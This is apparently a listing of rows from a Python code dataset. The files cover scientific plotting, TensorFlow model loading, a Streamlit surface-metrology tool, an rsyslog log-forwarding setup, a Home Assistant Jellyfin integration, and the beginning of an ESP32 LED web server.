id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
21410 | from pylab import *
import tables
def exactSol(X, Y, t):
return exp(-2*t)*sin(X)*cos(Y)
fh = tables.openFile("s251-dg-diffuse-2d_q_1.h5")
q = fh.root.StructGridField
nx, ny, nc = q.shape
dx = 2*pi/nx
Xf = linspace(0, 2*pi-dx, nx)
dy = 2*pi/ny
Yf = linspace(0, 2*pi-dy, ny)
XX, YY = meshgrid(Xf, Yf)
Xhr = linspace(0, 2*pi, 101)
Yhr = linspace(0, 2*pi, 101)
XXhr, YYhr = meshgrid(Xhr, Yhr)
fhr = exactSol(XXhr, YYhr, 1.0)
figure(1)
pcolormesh(Xhr, Yhr, fhr)
colorbar()
figure(2)
pcolormesh(Xf, Yf, q[:,:,0])
colorbar()
# compute error
fex = exactSol(XX, YY, 1.0)
error = abs(fex.transpose()-q[:,:,0]).sum()/(nx*ny);
print "%g %g" % (dx, error)
def evalSum(coeff, fields):
res = 0.0*fields[0]
for i in range(len(coeff)):
res = res + coeff[i]*fields[i]
return res
def projectOnFinerGrid_f24(Xc, Yc, q):
dx = Xc[1]-Xc[0]
dy = Yc[1]-Yc[0]
nx = Xc.shape[0]
ny = Yc.shape[0]
# mesh coordinates
Xn = linspace(Xc[0]-0.5*dx, Xc[-1]+0.5*dx, 2*nx+1) # one more
Yn = linspace(Yc[0]-0.5*dy, Yc[-1]+0.5*dy, 2*ny+1) # one more
XXn, YYn = meshgrid(Xn, Yn)
# data
qn = zeros((2*Xc.shape[0], 2*Yc.shape[0]), float)
v1 = q[:,:,0]
v2 = q[:,:,1]
v3 = q[:,:,2]
v4 = q[:,:,3]
vList = [v1,v2,v3,v4]
# node 1
c1 = [0.5625,0.1875,0.0625,0.1875]
qn[0:2*nx:2, 0:2*ny:2] = evalSum(c1, vList)
# node 2
c2 = [0.1875,0.5625,0.1875,0.0625]
qn[1:2*nx:2, 0:2*ny:2] = evalSum(c2, vList)
# node 3
c3 = [0.1875,0.0625,0.1875,0.5625]
qn[0:2*nx:2, 1:2*ny:2] = evalSum(c3, vList)
# node 4
c4 = [0.0625,0.1875,0.5625,0.1875]
qn[1:2*nx:2, 1:2*ny:2] = evalSum(c4, vList)
return XXn, YYn, qn
Xc = linspace(0.5*dx, 2*pi-0.5*dx, nx)
Yc = linspace(0.5*dy, 2*pi-0.5*dy, ny)
Xp, Yp, qp = projectOnFinerGrid_f24(Xc, Yc, q)
figure(1)
subplot(1,2,1)
pcolormesh(Xp, Yp, transpose(qp))
title('RDG t=1')
colorbar(shrink=0.5)
axis('image')
subplot(1,2,2)
pcolormesh(Xhr, Yhr, fhr)
title('Exact t=1')
colorbar(shrink=0.5)
axis('image')
savefig('s251-exact-cmp.png')
show()
| StarcoderdataPython |
1798253 | <reponame>AntoninoScala/air-water-vv<filename>2d/caissonBreakwater/fixed/geometryPlot.py
from numpy import *
from scipy import *
from pylab import *
import collections as cll
import csv
# Put tankVertices and caissonVertices arrays here
#tankVertices
tv=np.array([[0.0, 0.0],
[0.38992935246580784, 0.0],
[1.1697880573974235, 0.0],
[1.3197880573974234, 0.075],
[2.0197880573974234, 0.075],
[2.1697880573974233, 0.0],
[2.949646762329039, 0.0],
[3.7295054672606547, 0.0],
[3.7295054672606547, 1.0],
[2.949646762329039, 1.0],
[0.38992935246580784, 1.0],
[0.0, 1.0],],
)
nt=len(tv)
#caissonVertices
cv=np.array( [[ 1.44978806, 0.075 ],
[ 1.88978806, 0.075 ],
[ 1.88978806, 0.475 ],
[ 1.44978806, 0.475 ]],
)
nc=len(cv)
xt=[]
yt=[]
xc=[]
yc=[]
for i in range(nt):
xt.append(tv[i][0])
yt.append(tv[i][1])
#xt.append(tv[0][0])
#yt.append(tv[0][1])
for j in range(nc):
xc.append(cv[j][0])
yc.append(cv[j][1])
xc.append(cv[0][0])
yc.append(cv[0][1])
# Plot geometry
import matplotlib.pyplot as plt
plt.plot(xt,yt)
plt.plot(xc,yc)
plt.xlabel('x [m]')
plt.ylabel('y [m]')
plt.suptitle('geometry')
plt.show()
savefig('geometry.png')
| StarcoderdataPython |
3353433 | import tensorflow as tf
class Predict(object):
def __init__(self, path1, path2):
self.graph = tf.Graph()
with self.graph.as_default():
self.saver = tf.train.import_meta_graph(path1)
self.sess = tf.Session(graph=self.graph)
with self.sess.as_default():
with self.graph.as_default():
self.saver.restore(self.sess, path2)
def predict1(self, batch):
y = self.graph.get_tensor_by_name('Softmax:0')
proba = self.graph.get_tensor_by_name('Add_1:0')
X = self.graph.get_operation_by_name('X').outputs[0]
keep_prob = self.graph.get_operation_by_name('keep_prob').outputs[0]
cnn_logits, pre_pro = self.sess.run([proba, y], feed_dict={X: batch, keep_prob: 1.0})
return cnn_logits, pre_pro
def predict2(self, batch):
# tf.reset_default_graph()
y = self.graph.get_tensor_by_name('Softmax:0')
proba = self.graph.get_tensor_by_name('add:0')
X = self.graph.get_operation_by_name('X').outputs[0]
# batch = batch.reshape((batch_size, timesteps, num_input))
rnn_logits, pre_pro = self.sess.run([proba, y], feed_dict={X: batch})
return rnn_logits, pre_pro
def predict_models():
class DataSets(object):
pass
pre_label = DataSets()
pre_label.cnn = Predict('/home/asdf/Documents/juyan/paper/salinas/mdcpe_result/newmdcpe/model/cnn/'
'CNN0507.ckpt.meta',
'/home/asdf/Documents/juyan/paper/salinas/mdcpe_result/newmdcpe/model/cnn/'
'CNN0507.ckpt')
pre_label.rnn = Predict('/home/asdf/Documents/juyan/paper/salinas/mdcpe_result/newmdcpe/model/rnn/'
'RNN0507.ckpt.meta',
'/home/asdf/Documents/juyan/paper/salinas/mdcpe_result/newmdcpe/model/rnn/'
'RNN0507.ckpt')
return pre_label | StarcoderdataPython |
155419 | <reponame>Jesse-Redford/SurfaceMetrology
import os
import cv2
import glob
import time
import h5py
import imageio
import numpy as np
import pandas as pd
from PIL import Image
import streamlit as st
from src.ISO251782 import iso25178
from sklearn.impute import KNNImputer
def external_folder_selector(folder_path):
print(folder_path)
filenames = glob.glob(folder_path)
selected_filename = st.selectbox('Select a folder', filenames)
return os.path.join(folder_path, selected_filename)
def folder_selector(folder_path='.'):
filenames = glob.glob(r'./Datasets/MultiClass/*')
selected_filename = st.selectbox('Select a folder', filenames)
return os.path.join(folder_path, selected_filename)
def file_selector(folder_path='.'):
filenames = [os.path.join(path, name) for path, subdirs, files in os.walk(folder_path) for name in files]
selected_filename = st.selectbox('Select a file', filenames)
return selected_filename
def to_dict(tup, di={}):
di = dict(tup)
return di
# %% loader function % https://gist.github.com/g-s-k/ccffb1e84df065a690e554f4b40cfd3a
def datx2py(file_name):
# unpack an h5 group into a dict
def _group2dict(obj):
return {k: _decode_h5(v) for k, v in zip(obj.keys(), obj.values())}
# unpack a numpy structured array into a dict
def _struct2dict(obj):
names = obj.dtype.names
return [dict(zip(names, _decode_h5(record))) for record in obj]
# decode h5py.File object and all of its elements recursively
def _decode_h5(obj):
# group -> dict
if isinstance(obj, h5py.Group):
d = _group2dict(obj)
if len(obj.attrs):
d['attrs'] = _decode_h5(obj.attrs)
return d
# attributes -> dict
elif isinstance(obj, h5py.AttributeManager):
return _group2dict(obj)
# dataset -> numpy array if not empty
elif isinstance(obj, h5py.Dataset):
d = {'attrs': _decode_h5(obj.attrs)}
try:
d['vals'] = obj[()]
except (OSError, TypeError):
pass
return d
# numpy array -> unpack if possible
elif isinstance(obj, np.ndarray):
if np.issubdtype(obj.dtype, np.number) and obj.shape == (1,):
return obj[0]
elif obj.dtype == 'object':
return _decode_h5([_decode_h5(o) for o in obj])
elif np.issubdtype(obj.dtype, np.void):
return _decode_h5(_struct2dict(obj))
else:
return obj
# dimension converter -> dict
elif isinstance(obj, np.void):
return _decode_h5([_decode_h5(o) for o in obj])
# bytes -> str
elif isinstance(obj, bytes):
return obj.decode()
# collection -> unpack if length is 1
elif isinstance(obj, list) or isinstance(obj, tuple):
if len(obj) == 1:
return obj[0]
else:
return obj
# other stuff
else:
return obj
# open the file and decode it
with h5py.File(file_name, 'r') as f:
h5data = _decode_h5(f)
zdata = h5data['Data']['Surface']
zdata = list(zdata.values())[0]
zvals = zdata['vals']
zvals[zvals == zdata['attrs']['No Data']] = np.nan
# get units
zunit = zdata['attrs']['Z Converter']['BaseUnit']
# Fill nans use global mean
#zvals[np.isnan(zvals)] = np.nanmean(zvals)
#return zvals
# Fill nans using KNN imputation
imputer = KNNImputer(n_neighbors=10,missing_values=np.nan)
zzvals = imputer.fit_transform(zvals)
return np.ascontiguousarray(zzvals, dtype=np.float64)
def app():
st.title('Dataset Compiler')
st.write('Created by <NAME>')
if st.checkbox('External Folder'):
path = st.text_input('Enter Path to Dataset')
foldername = external_folder_selector(path)
else:
foldername = folder_selector()
st.write('You selected `%s`' % foldername)
filename = file_selector(folder_path=foldername)
st.write('You selected `%s`' % filename)
if filename:
z = None
loaded_image = None
if filename.endswith('.datx'):
z = datx2py(filename)
loaded_image = cv2.normalize(z, z, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U) # for displaying on st.image
elif filename.lower().endswith('.tiff'):
z = np.asarray(imageio.imread(filename))
loaded_image = cv2.normalize(z,z,0,255, cv2.NORM_MINMAX,cv2.CV_8U) # for displaying on st.image
elif filename.lower().endswith(('.bmp','.png', '.jpg', '.jpeg')):
z = np.asarray(Image.open(filename, mode='r').convert('L'))
loaded_image = Image.open(filename, mode='r')
else:
print('File Type Not Excepted')
col1, col2,col3 = st.columns([3,1,3])
with col1:
st.write("Source")
st.image(loaded_image, caption=f"{filename} {str(z.dtype)} {str(z.shape)}", width=250)
with col2:
st.write("")
with col3:
st.write("Converted")
if len(z.shape) > 2: # if RGB apply luma transform
z = (0.2989 * z[:,:,0] + 0.5870 * z[:,:,1] + 0.114 * z[:,:,2])
loaded_image = cv2.normalize(z, z, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U)
st.image(loaded_image, caption= f'Converted data is displayed in 8bit for preview, actual dtype: {str(z.dtype)} {str(z.shape)}', width=250)
st.write(z.dtype, z.shape)
st.subheader('Select Features To Compute on Dataset')
iso = iso25178()
selected_parameters = []
for par_type in iso.parameter_types:
if st.checkbox(f'{par_type} ({str(len(getattr(iso, par_type)))})'):
selected_parameters += getattr(iso, par_type)
user_pars = st.multiselect('Selected Parameters', selected_parameters, selected_parameters)
# Show options to modify polar plot defaults if any polar plot parameters are selected by user
if any(x in iso.polarplot_parameters for x in user_pars):
st.write('Set PolarPlot Parameters')
c1,c2 = st.columns(2)
if st.checkbox('Use Nan Masking for Polar Plot'):
iso.pp_mask = True
else:
iso.pp_mask = False
iso.theta_step = st.number_input('Enter rotation increment for Polar Plot (default = 1)',min_value=.1,max_value=1.0,value=1.0)
if st.button(f'Compute and Preview The ({str(len(user_pars))}) Selected Parameters'):
iso.parameters = user_pars
start = time.time()
features = iso.compute_features(z)
end = time.time()
col1, col2 = st.columns([3, 3])
col1.image(loaded_image, width=250)
col1.write(f'Processing Time: {round(end-start,3)} seconds')
col2.dataframe(pd.DataFrame(features),height=250)
dataset_name = st.text_input('Input the name of the dataset here:')
if st.button('Generate Dataset'):
iso.parameters = user_pars #iso_pars
rootdir = foldername
folder = []
filename = []
for file in os.listdir(rootdir):
folder_path = os.path.join(rootdir, file)
if os.path.isdir(folder_path):
folder_name = os.path.basename(folder_path)
for img_file in sorted(os.listdir(folder_path)):
folder.append(folder_name)
filename.append(folder_name + '/' + img_file)
df_reff = pd.DataFrame({'label': folder, 'image': filename})
df = pd.DataFrame(columns=iso.parameters)
progress_bar = st.progress(0)
for i, image in enumerate(df_reff.image):
progress_bar.progress(i / len(df_reff.image))
# open the image according to file type
filename = foldername + '/' + image
if filename.endswith('.datx'):
z = datx2py(filename)
elif filename.lower().endswith(('.tiff', '.tif')):
z = np.asarray(imageio.imread(filename))
if len(z.shape) > 2: # if RGB apply luma transform
z = (0.2989 * z[:, :, 0] + 0.5870 * z[:, :, 1] + 0.114 * z[:, :, 2])
elif filename.lower().endswith(('.bmp', '.png', '.jpg', '.jpeg')):
z = np.asarray(Image.open(filename, mode='r').convert('L'))
else:
print('File Type Not Excepted')
# compute selected features on data and add new values to dataframe
features = to_dict(iso.compute_features(z))
df = df.append(features, ignore_index=True)
df = df_reff.join(df)
# save data as pickle file and display on console
df.to_pickle(os.path.join(os.getcwd()+'\Datasets\Tabular', dataset_name + ".pkl"))
st.subheader(dataset_name + ".pkl")
st.dataframe(df)
| StarcoderdataPython |
1783252 | <reponame>didiqu/IS_simulator
"""This file contain all functions about log configuration """
from colorama import Fore, Style
from .logic_actions_utils import execute_command, upload_file, change_fileorfolder_user_owner, restart_service
def rsyslog_client(instance, arg, verbose=True):
""" Configure rsyslog client to send log to log server on the remote instance """
facility = 1
execute_command(instance, {"command":["sed", "-i", "/imklog/s/^/#/", "/etc/rsyslog.conf"], "expected_exit_code":"0"}, verbose=False)
for log in arg["log_files"]:
file_conf = open("simulation/workstations/"+instance.name+"/"+log+".conf", "w", encoding="utf-8")
if log == "authentication":
file_conf.write("auth,authpriv.* @"+arg["ip_log_server"]+":5001\n")
if log == "mail":
file_conf.write("mail.* @"+arg["ip_log_server"]+":5001\n")
if log == "apache2":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/apache2/access.log\" Tag=\"http_access\" Severity=\"info\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/apache2/error.log\" Tag=\"http_error\" Severity=\"error\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
if log == "iptables":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/ulog/syslogemu.log\" Tag=\"iptables\" Severity=\"info\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
if log == "squid":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/squid/access.log\" Tag=\"http_access\" Severity=\"info\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/squid/cache.log\" Tag=\"http_cache\" Severity=\"info\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
if log == "snort":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/snort/alert\" Tag=\"snort\" Severity=\"alert\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
if log == "suricata":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/suricata/fast.log\" Tag=\"suricata\" Severity=\"alert\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
if log == "ldap":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/slapd.log\" Tag=\"slapd\" Severity=\"info\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
if log == "samba":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/samba/samba.log\" Tag=\"samba\" Severity=\"info\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
if log == "motion":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/motion/motion.log\" Tag=\"motion\" Severity=\"info\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
file_conf.close()
if upload_file(instance, {"instance_path":"/etc/rsyslog.d/"+log+".conf", "host_manager_path":"simulation/workstations/"+instance.name+"/"+log+".conf"}, verbose=False) == 1:
return 1
if change_fileorfolder_user_owner(instance, {"new_owner":"syslog", "file_path":"/etc/rsyslog.d/"+log+".conf"}, verbose=False) == 1:
return 1
if restart_service(instance, {"service":"rsyslog"}, verbose=False) == 1:
return 1
if verbose:
print(Fore.GREEN+" Install and configure rsyslog client successfully!"+Style.RESET_ALL)
return 0
| StarcoderdataPython |
1602232 | <reponame>Sim7b/jellyfin_ha<filename>__init__.py
"""The jellyfin component."""
import logging
import time
import re
import traceback
import collections.abc
from typing import Mapping, MutableMapping, Optional, Sequence, Iterable, List, Tuple
import voluptuous as vol
from homeassistant.exceptions import ConfigEntryNotReady
from jellyfin_apiclient_python import JellyfinClient
from jellyfin_apiclient_python.connection_manager import CONNECTION_STATE
from homeassistant.core import HomeAssistant
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ( # pylint: disable=import-error
ATTR_ENTITY_ID,
CONF_URL,
CONF_USERNAME,
CONF_PASSWORD,
CONF_VERIFY_SSL,
CONF_CLIENT_ID,
EVENT_HOMEASSISTANT_STOP,
)
import homeassistant.helpers.config_validation as cv # pylint: disable=import-error
from homeassistant.helpers.dispatcher import ( # pylint: disable=import-error
async_dispatcher_send,
)
from .const import (
DOMAIN,
SIGNAL_STATE_UPDATED,
SERVICE_SCAN,
STATE_OFF,
STATE_IDLE,
STATE_PAUSED,
STATE_PLAYING,
)
from .device import JellyfinDevice
_LOGGER = logging.getLogger(__name__)
PLATFORMS = ["sensor", "media_player"]
UPDATE_UNLISTENER = None
USER_APP_NAME = "Home Assistant"
CLIENT_VERSION = "1.0"
PATH_REGEX = re.compile("^(https?://)?([^/:]+)(:[0-9]+)?(/.*)?$")
SCAN_SERVICE_SCHEMA = vol.Schema(
{
vol.Required(ATTR_ENTITY_ID): cv.entity_id,
}
)
def autolog(message):
"Automatically log the current function details."
import inspect
# Get the previous frame in the stack, otherwise it would
# be this function!!!
func = inspect.currentframe().f_back.f_code
# Dump the message + the name of this function to the log.
_LOGGER.debug("%s: %s in %s:%i" % (
message,
func.co_name,
func.co_filename,
func.co_firstlineno
))
async def async_setup(hass: HomeAssistant, config: dict):
if DOMAIN not in hass.data:
hass.data[DOMAIN] = {}
return True
async def async_setup_entry(hass: HomeAssistant, config_entry: ConfigEntry):
global UPDATE_UNLISTENER
if UPDATE_UNLISTENER:
UPDATE_UNLISTENER()
if not config_entry.unique_id:
hass.config_entries.async_update_entry(
config_entry, unique_id=config_entry.title
)
config = {}
for key, value in config_entry.data.items():
config[key] = value
for key, value in config_entry.options.items():
config[key] = value
if config_entry.options:
hass.config_entries.async_update_entry(config_entry, data=config, options={})
UPDATE_UNLISTENER = config_entry.add_update_listener(_update_listener)
hass.data[DOMAIN][config.get(CONF_URL)] = {}
_jelly = JellyfinClientManager(hass, config)
try:
await _jelly.connect()
hass.data[DOMAIN][config.get(CONF_URL)]["manager"] = _jelly
except:
_LOGGER.error("Cannot connect to Jellyfin server.")
raise
async def service_trigger_scan(service):
entity_id = service.data.get(ATTR_ENTITY_ID)
for sensor in hass.data[DOMAIN][config.get(CONF_URL)]["sensor"]["entities"]:
if sensor.entity_id == entity_id:
await sensor.async_trigger_scan()
hass.services.async_register(
DOMAIN,
SERVICE_SCAN,
service_trigger_scan,
schema=SCAN_SERVICE_SCHEMA,
)
for component in PLATFORMS:
hass.data[DOMAIN][config.get(CONF_URL)][component] = {}
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(config_entry, component)
)
async_dispatcher_send(hass, SIGNAL_STATE_UPDATED)
async def stop_jellyfin(event):
"""Stop Jellyfin connection."""
await _jelly.stop()
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_jellyfin)
await _jelly.start()
return True
async def _update_listener(hass, config_entry):
"""Update listener."""
await hass.config_entries.async_reload(config_entry.entry_id)
class JellyfinClientManager(object):
def __init__(self, hass: HomeAssistant, config_entry):
self.hass = hass
self.callback = lambda client, event_name, data: None
self.jf_client: JellyfinClient = None
self.is_stopping = True
self._event_loop = hass.loop
self.host = config_entry[CONF_URL]
self._info = None
self.config_entry = config_entry
self.server_url = ""
self._sessions = None
self._devices: Mapping[str, JellyfinDevice] = {}
# Callbacks
self._new_devices_callbacks = []
self._stale_devices_callbacks = []
self._update_callbacks = []
@staticmethod
def expo(max_value = None):
n = 0
while True:
a = 2 ** n
if max_value is None or a < max_value:
yield a
n += 1
else:
yield max_value
@staticmethod
def clean_none_dict_values(obj):
"""
Recursively remove keys with a value of None
"""
if not isinstance(obj, collections.abc.Iterable) or isinstance(obj, str):
return obj
queue = [obj]
while queue:
item = queue.pop()
if isinstance(item, collections.abc.Mapping):
mutable = isinstance(item, collections.abc.MutableMapping)
remove = []
for key, value in item.items():
if value is None and mutable:
remove.append(key)
elif isinstance(value, str):
continue
elif isinstance(value, collections.abc.Iterable):
queue.append(value)
if mutable:
# Remove keys with None value
for key in remove:
item.pop(key)
elif isinstance(item, collections.abc.Iterable):
for value in item:
if value is None or isinstance(value, str):
continue
elif isinstance(value, collections.abc.Iterable):
queue.append(value)
return obj
async def connect(self):
autolog(">>>")
is_logged_in = await self.hass.async_add_executor_job(self.login)
if is_logged_in:
_LOGGER.info("Successfully added server.")
else:
raise ConfigEntryNotReady
@staticmethod
def client_factory(config_entry):
client = JellyfinClient(allow_multiple_clients=True)
client.config.data["app.default"] = True
client.config.app(
USER_APP_NAME, CLIENT_VERSION, USER_APP_NAME, config_entry[CONF_CLIENT_ID]
)
client.config.data["auth.ssl"] = config_entry[CONF_VERIFY_SSL]
return client
def login(self):
autolog(">>>")
self.server_url = self.config_entry[CONF_URL]
if self.server_url.endswith("/"):
self.server_url = self.server_url[:-1]
protocol, host, port, path = PATH_REGEX.match(self.server_url).groups()
if not protocol:
_LOGGER.warning("Adding http:// because it was not provided.")
protocol = "http://"
if protocol == "http://" and not port:
_LOGGER.warning("Adding port 8096 for insecure local http connection.")
_LOGGER.warning(
"If you want to connect to standard http port 80, use :80 in the url."
)
port = ":8096"
if protocol == "https://" and not port:
port = ":443"
self.server_url = "".join(filter(bool, (protocol, host, port, path)))
self.jf_client = self.client_factory(self.config_entry)
self.jf_client.auth.connect_to_address(self.server_url)
result = self.jf_client.auth.login(self.server_url, self.config_entry[CONF_USERNAME], self.config_entry[CONF_PASSWORD])
if "AccessToken" not in result:
return False
credentials = self.jf_client.auth.credentials.get_credentials()
self.jf_client.authenticate(credentials)
return True
async def start(self):
autolog(">>>")
def event(event_name, data):
_LOGGER.debug("Event: %s", event_name)
if event_name == "WebSocketConnect":
self.jf_client.wsc.send("SessionsStart", "0,1500")
elif event_name == "WebSocketDisconnect":
timeout_gen = self.expo(100)
while not self.is_stopping:
timeout = next(timeout_gen)
_LOGGER.warning(
"No connection to server. Next try in {0} second(s)".format(
timeout
)
)
self.jf_client.stop()
time.sleep(timeout)
if self.login():
break
elif event_name == "Sessions":
self._sessions = self.clean_none_dict_values(data)["value"]
self.update_device_list()
else:
self.callback(self.jf_client, event_name, data)
self.jf_client.callback = event
self.jf_client.callback_ws = event
await self.hass.async_add_executor_job(self.jf_client.start, True)
self.is_stopping = False
self._info = await self.hass.async_add_executor_job(self.jf_client.jellyfin._get, "System/Info")
self._sessions = self.clean_none_dict_values(await self.hass.async_add_executor_job(self.jf_client.jellyfin.get_sessions))
async def stop(self):
autolog(">>>")
await self.hass.async_add_executor_job(self.jf_client.stop)
self.is_stopping = True
def update_device_list(self):
""" Update device list. """
autolog(">>>")
# _LOGGER.debug("sessions: %s", str(sessions))
if self._sessions is None:
_LOGGER.error('Error updating Jellyfin devices.')
return
try:
new_devices = []
active_devices = []
dev_update = False
for device in self._sessions:
# _LOGGER.debug("device: %s", str(device))
dev_name = '{}.{}'.format(device['DeviceId'], device['Client'])
try:
_LOGGER.debug('Session msg on %s of type: %s, themeflag: %s',
dev_name, device['NowPlayingItem']['Type'],
device['NowPlayingItem']['IsThemeMedia'])
except KeyError:
pass
active_devices.append(dev_name)
if dev_name not in self._devices and \
device['DeviceId'] != self.config_entry[CONF_CLIENT_ID]:
_LOGGER.debug('New Jellyfin DeviceID: %s. Adding to device list.',
dev_name)
new = JellyfinDevice(device, self)
self._devices[dev_name] = new
new_devices.append(new)
elif device['DeviceId'] != self.config_entry[CONF_CLIENT_ID]:
# Before we send in new data check for changes to state
# to decide if we need to fire the update callback
if not self._devices[dev_name].is_active:
# Device wasn't active on the last update
# We need to fire a device callback to let subs now
dev_update = True
do_update = self.update_check(
self._devices[dev_name], device)
self._devices[dev_name].update_data(device)
self._devices[dev_name].set_active(True)
if dev_update:
self._do_new_devices_callback(0)
dev_update = False
if do_update:
self._do_update_callback(dev_name)
# Need to check for new inactive devices and flag
for dev_id in self._devices:
if dev_id not in active_devices:
# Device no longer active
if self._devices[dev_id].is_active:
self._devices[dev_id].set_active(False)
self._do_update_callback(dev_id)
self._do_stale_devices_callback(dev_id)
# Call device callback if new devices were found.
if new_devices:
self._do_new_devices_callback(0)
except Exception as e:
_LOGGER.critical(traceback.format_exc())
raise
def update_check(self, existing: JellyfinDevice, new: JellyfinDevice):
""" Check device state to see if we need to fire the callback.
True if either state is 'Playing'
False if both states are: 'Paused', 'Idle', or 'Off'
True on any state transition.
"""
autolog(">>>")
old_state = existing.state
if 'NowPlayingItem' in existing.session_raw:
try:
old_theme = existing.session_raw['NowPlayingItem']['IsThemeMedia']
except KeyError:
old_theme = False
else:
old_theme = False
if 'NowPlayingItem' in new:
if new['PlayState']['IsPaused']:
new_state = STATE_PAUSED
else:
new_state = STATE_PLAYING
try:
new_theme = new['NowPlayingItem']['IsThemeMedia']
except KeyError:
new_theme = False
else:
new_state = STATE_IDLE
new_theme = False
if old_theme or new_theme:
return False
elif old_state == STATE_PLAYING or new_state == STATE_PLAYING:
return True
elif old_state != new_state:
return True
else:
return False
@property
def info(self):
if self.is_stopping:
return None
return self._info
async def trigger_scan(self):
await self.hass.async_add_executor_job(self.jf_client.jellyfin._post, "Library/Refresh")
async def get_item(self, id):
return await self.hass.async_add_executor_job(self.jf_client.jellyfin.get_item, id)
async def get_items(self, query=None):
response = await self.hass.async_add_executor_job(self.jf_client.jellyfin.users, "/Items", "GET", query)
#_LOGGER.debug("get_items: %s | %s", str(query), str(response))
return response["Items"]
async def set_playstate(self, session_id, state, params):
await self.hass.async_add_executor_job(self.jf_client.jellyfin.post_session, session_id, "Playing/%s" % state, params)
async def play_media(self, session_id, media_id):
params = {
"playCommand": "PlayNow",
"itemIds": media_id
}
await self.hass.async_add_executor_job(self.jf_client.jellyfin.post_session, session_id, "Playing", params)
async def get_artwork(self, media_id) -> Tuple[Optional[str], Optional[str]]:
query = {
"format": "PNG",
"maxWidth": 500,
"maxHeight": 500
}
image = await self.hass.async_add_executor_job(self.jf_client.jellyfin.items, "GET", "%s/Images/Primary" % media_id, query)
if image is not None:
return (image, "image/png")
return (None, None)
async def get_artwork_url(self, media_id) -> str:
return await self.hass.async_add_executor_job(self.jf_client.jellyfin.artwork, media_id, "Primary", 500)
@property
def api(self):
""" Return the api. """
return self.jf_client.jellyfin
@property
def devices(self) -> Mapping[str, JellyfinDevice]:
""" Return devices dictionary. """
return self._devices
@property
def is_available(self):
return not self.is_stopping
# Callbacks
def add_new_devices_callback(self, callback):
"""Register as callback for when new devices are added. """
self._new_devices_callbacks.append(callback)
_LOGGER.debug('Added new devices callback to %s', callback)
def _do_new_devices_callback(self, msg):
"""Call registered callback functions."""
for callback in self._new_devices_callbacks:
_LOGGER.debug('Devices callback %s', callback)
self._event_loop.call_soon(callback, msg)
def add_stale_devices_callback(self, callback):
"""Register as callback for when stale devices exist. """
self._stale_devices_callbacks.append(callback)
_LOGGER.debug('Added stale devices callback to %s', callback)
def _do_stale_devices_callback(self, msg):
"""Call registered callback functions."""
for callback in self._stale_devices_callbacks:
_LOGGER.debug('Stale Devices callback %s', callback)
self._event_loop.call_soon(callback, msg)
def add_update_callback(self, callback, device):
"""Register as callback for when a matching device changes."""
self._update_callbacks.append([callback, device])
_LOGGER.debug('Added update callback to %s on %s', callback, device)
def remove_update_callback(self, callback, device):
""" Remove a registered update callback. """
if [callback, device] in self._update_callbacks:
self._update_callbacks.remove([callback, device])
_LOGGER.debug('Removed update callback %s for %s',
callback, device)
def _do_update_callback(self, msg):
"""Call registered callback functions."""
for callback, device in self._update_callbacks:
if device == msg:
_LOGGER.debug('Update callback %s for device %s by %s',
callback, device, msg)
self._event_loop.call_soon(callback, msg)
| StarcoderdataPython |
1672534 | #-------------------------------------------------------
# Annexe 2 : commander une LED à partir d'une page web
#-------------------------------------------------------
"""
AuteurDate :
Rôle :
- Connexion à une borne Wifi (partage de connexion sur téléphone)
- Afficher dans la console les paramètres réseau : adresse IP de la carte
- Serveur web : afficher une page sur le client (téléphone ou tablette)
- Commander une LED à l'aide de la page web
- Afficher l'état de la LED dans la page web.
Version 1 :
"""
try:
import usocket as socket
except:
import socket
from machine import Pin
import network
import esp
esp.osdebug(None)
import gc
gc.collect()
"""
ssid = 'REPLACE_WITH_YOUR_SSID'
password = '<PASSWORD>'
"""
ssid = 'à_modifier'
password = '<PASSWORD>'
station = network.WLAN(network.STA_IF)
station.active(True)
station.connect(ssid, password)
while station.isconnected() == False:
pass
print('Connection successful')
print(station.ifconfig())
led_in = Pin(2, Pin.OUT)
led_ext = Pin(26, Pin.OUT)
def web_page():
if led_in.value() == 1:
gpio_state="ON"
else:
gpio_state="OFF"
html = """<html><head> <title>ESP Web Server</title> <meta name="viewport" content="width=device-width, initial-scale=1">
